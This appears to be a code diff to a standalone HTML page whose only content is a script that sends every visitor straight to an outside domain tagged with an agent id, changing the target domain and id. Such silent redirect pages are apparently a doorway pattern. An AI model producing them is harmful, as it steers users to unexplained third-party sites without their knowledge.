--- a/86.html
+++ b/86.html
@@ -1,3 +1,3 @@
 <script>
-  window.location.href="https://main.RY803.com/?AgentId=12104074"
+  window.location.href="https://main.RY872.com/?AgentId=202048"
 </script>
